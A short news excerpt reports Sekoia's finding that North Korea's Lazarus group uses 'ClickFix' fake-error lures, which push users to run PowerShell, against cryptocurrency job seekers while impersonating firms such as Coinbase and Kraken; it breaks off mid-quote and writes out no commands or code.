North Korean hackers adopt ClickFix attacks to target crypto firms

The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). This development, reported by Sekoia, is seen as an evolution of the threat actor's 'Contagious Interview' campaign that similarly targets job seekers in the AI and cryptocurrency space. ClickFix is a relatively new but increasingly common tactic where threat actors use fake errors on websites or documents indicating a problem viewing the content. The page then prompts the user to "fix" the issue by running PowerShell commands that download and execute the malware on the system. Sekoia says that Lazarus impersonates numerous well-known companies in the latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, from which the North Korean threat actors recently stole a record $1.5 billion. "By collecting data (i.e. JSON objects) i ... Read full article.